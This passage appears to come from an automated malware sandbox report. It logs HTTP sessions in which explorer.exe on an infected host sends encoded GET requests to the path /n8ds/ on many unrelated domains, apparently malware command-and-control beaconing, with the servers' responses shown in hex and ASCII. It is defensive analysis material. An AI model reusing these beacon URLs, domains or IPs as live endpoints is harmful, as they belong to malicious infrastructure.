30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.11.20	49815	185.98.5.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:37:57.337733030 CET	511	OUT	GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.avto-click.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:37:57.436963081 CET	512	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Dec 2021 09:37:57 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.11.20	49816	50.118.200.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:38:19.362488031 CET	514	OUT	GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.mariforum.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:38:19.525703907 CET	515	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Dec 2021 09:38:10 GMT Content-Type: text/html Content-Length: 801 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c7 e0 ba a3 b4 c8 c1 b1 b2 cd d2 fb b9 dc c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.11.20	49817	199.59.242.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:38:24.622596025 CET	515	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1 Host: www.effective.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:38:24.716063976 CET	517	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 01 Dec 2021 09:38:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: parking_session=bf09115c-635b-fc52-62e0-dc520c809c1d; expires=Wed, 01-Dec-2021 09:53:24 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aouWvJ9foHu9h2IZO1AVXAiGkFF0mjysLia46XFfNlV3BgMktnDdtB++9NcJeojUA3StzqNPT22SrzKXPGtwTA== Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 35 39 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 6f 75 57 76 4a 39 66 6f 48 75 39 68 32 49 5a 4f 31 41 56 58 41 69 47 6b 46 46 30 6d 6a 79 73 4c 69 61 34 36 58 46 66 4e 6c 56 33 42 67 4d 6b 74 6e 44 64 74 42 2b 2b 39 4e 63 4a 65 6f 6a 55 41 33 53 74 7a 71 4e 50 54 32 32 53 72 7a 4b 58 50 47 74 77 54 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73 Data Ascii: 591<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aouWvJ9foHu9h2IZO1AVXAiGkFF0mjysLia46XFfNlV3BgMktnDdtB++9NcJeojUA3StzqNPT22SrzKXPGtwTA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross
Dec 1, 2021 10:38:24.716120958 CET	517	IN	Data Raw: 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 Data Ascii: origin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiYmYwOTExNWMtNjM1Yi1mYzUyLTYyZTAtZGM1MjBjODA5YzFkIiwicGFnZV90aW1lIjoxNjM4MzUxNTA0LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy5lZmZlY3RpdmUuc3RvcmVcL244ZHNcLz
Dec 1, 2021 10:38:24.716157913 CET	517	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.11.20	49818	34.237.47.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:38:52.386452913 CET	519	OUT	GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1 Host: www.fatima2021.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:38:52.516884089 CET	520	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Dec 2021 09:38:52 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: https://www.fatima2021.com/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.11.20	49819	185.68.16.57	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:02.574249983 CET	520	OUT	GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1 Host: www.dubaicars.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:02.615684032 CET	522	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Dec 2021 09:39:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ray: p529:0.000/wn25376:0.000/wa25376:D=4093 Data Raw: 36 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 54 49 54 4c 45 3e d0 a1 d1 80 d0 be d0 ba 20 d0 bf d1 80 d0 b5 d0 b4 d0 be d1 81 d1 82 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d1 8f 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 b0 20 d0 b4 d0 bb d1 8f 20 64 75 62 61 69 63 61 72 73 2e 6f 6e 6c 69 6e 65 20 d0 b8 d1 81 d1 82 d0 b5 d0 ba 3c 2f 54 49 54 4c 45 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 3a 20 31 32 70 78 20 54 61 68 6f 6d 61 3b 7d 0a 09 09 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 63 6f 6c 6f 72 3a 23 31 46 38 34 46 46 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0a 09 09 61 20 7b 63 6f 6c 6f 72 3a 23 31 38 37 33 62 34 3b 7d 0a 09 09 64 69 76 20 7b 77 69 64 74 68 3a 20 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 20 31 30 30 70 78 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 30 70 78 3b 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 30 25 3b 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 0a 09 3c 68 31 3e d0 a1 d1 80 d0 be d0 ba 20 d0 bf d1 80 d0 b5 d0 b4 d0 be d1 81 d1 82 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d1 8f 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 b0 20 d0 b4 d0 bb d1 8f 20 64 75 62 61 69 63 61 72 73 2e 6f 6e 6c 69 6e 65 20 d0 b8 d1 81 d1 82 d0 b5 d0 ba 3c 2f 68 31 3e 0a 09 0a 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 65 65 65 22 3e 0a 09 20 20 20 20 3c 62 3e d0 98 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 bb d1 8f 20 d0 b0 d0 b4 d0 bc d0 b8 d0 bd d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 82 d0 be d1 80 d0 b0 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 21 3c 2f 62 3e 3c 62 72 3e 0a 09 20 20 20 20 d0 a3 20 d0 b0 d0 b4 d0 bc d0 b8 d0 bd d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 82 d0 be d1 80 d0 b0 20 d0 b5 d1 81 d1 82 d1 8c 20 d0 b2 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be d1 81 d1 82 d1 8c 20 d0 b1 d1 8b d1 81 d1 82 d1 80 d0 be 20 d0 b8 20 d0 b1 d0 b5 d0 b7 20 d0 be d0 bf d0 bb d0 b0 d1 82 d1 8b 20 d0 b2 d0 be d1 81 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 b8 d1 82 d1 8c 20 d1 80 d0 b0 d0 b1 d0 be d1 82 d1 83 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 b0 2e 0a 09 20 20 20 20 d0 94 d0 bb d1 8f 20 d1 8d d1 82 d0 be d0 b3 d0 be 20 d0 b2 20 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 64 6d 2e 74 6f 6f 6c 73 2f 68 6f 73 74 69 6e 67 2f 3f 70 61 67 65 3d 34 22 3e d0 bf d0 b0 d0 bd d0 b5 d0 bb d0 b8 20 d1 83 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d1 8f 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d0 be d0 bc 3c 2f 61 3e 20 d0 bd d0 b5 d0 be d0 b1 d1 85 d0 be d0 b4 Data Ascii: 672<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /><TITLE> dubaicars.online </TITLE><style>body {margin:0;padding:0;font: 12px Tahoma;}h1 {font-size:20px;color:#1F84FF;margin-bottom:20px;margin-top:0;font-weight:normal;line-height:30px;}a {color:#1873b4;}div {width: 700px;margin: 100px auto 0 auto;padding-top: 50px;height: 120px;line-height: 150%;}</style></head><body><div><h1> dubaicars.online </h1><div style="padding: 10px; background-color: #eeeeee"> <b> !</b><br> . <a rel="nofollow" href="https://adm.tools/hosting/?page=4"> </a>
Dec 1, 2021 10:39:02.615739107 CET	522	IN	Data Raw: d0 b8 d0 bc d0 be 20 d0 bd d0 b0 d0 b6 d0 b0 d1 82 d1 8c 20 d0 bd d0 b0 20 d0 ba d0 bd d0 be d0 bf d0 ba d1 83 20 22 d0 9f d1 80 d0 be d0 b4 d0 bb d0 b8 d1 82 d1 8c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b2 20 d0 ba d1 80 d0 b5 d0 b4 Data Ascii: " ". <br><br> , ,
Dec 1, 2021 10:39:02.615777969 CET	522	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.11.20	49820	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:07.736438990 CET	523	OUT	GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1 Host: www.inklusion.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:07.747466087 CET	524	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 01 Dec 2021 09:38:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49793	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:34:08.972954988 CET	454	OUT	GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.luxalbridi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:34:09.079700947 CET	454	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 01 Dec 2021 09:34:09 GMT Content-Type: text/html Content-Length: 275 ETag: "6192576d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.11.20	49821	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:39:17.808342934 CET	525	OUT	GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1 Host: www.heyvecino.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:39:17.915040016 CET	525	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 01 Dec 2021 09:39:17 GMT Content-Type: text/html Content-Length: 275 ETag: "6192576d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
